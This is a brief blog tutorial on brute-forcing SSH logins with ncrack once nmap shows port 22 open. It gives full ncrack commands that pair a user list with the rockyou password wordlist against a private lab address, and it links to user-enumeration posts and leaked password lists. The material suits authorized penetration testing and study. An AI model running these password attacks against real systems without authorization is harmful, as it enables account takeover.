ncrack – ssh brute force attacks

nmap

nmap is great

if you will find by nmap 22/tcp open ssh

and if you already found some user by:
http://blog.michalszalkowski.com/security/25-tcp-open-smtp-postfix-smtpd-user-enumeration/
http://blog.michalszalkowski.com/security/79-finger-user-enumeration/

you can tray to “brute force” password for ssh by ncrack

ncrack -v -U /home/tmp/users.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.13:22

ncrack is pre-installed in KaliLinux

if you want to install ncrack on you local machine use this

apt-get install -y libssl-dev && \
    cd /home && \
    wget -O ncrack.tar.gz https://github.com/nmap/ncrack/archive/v0.6.0.tar.gz && \
    tar -xzf ncrack.tar.gz && \
    cd ncrack-0.6.0 && \
    ./configure && \
    make && \
    make install && \
    cd /home && \
    rm ncrack.tar.gz

if you are ready, type

ncrack -v -U /home/tmp/users.txt -P /usr/share/wordlists/rockyou.txt 192.168.1.13:22

-U file with list of users, like

root
user
szalek

-P file with list of passwords, like

123456
12345
123456789
password
...

if you need passwords list: http://blog.michalszalkowski.com/security/skullsecurity-leaked-passwords/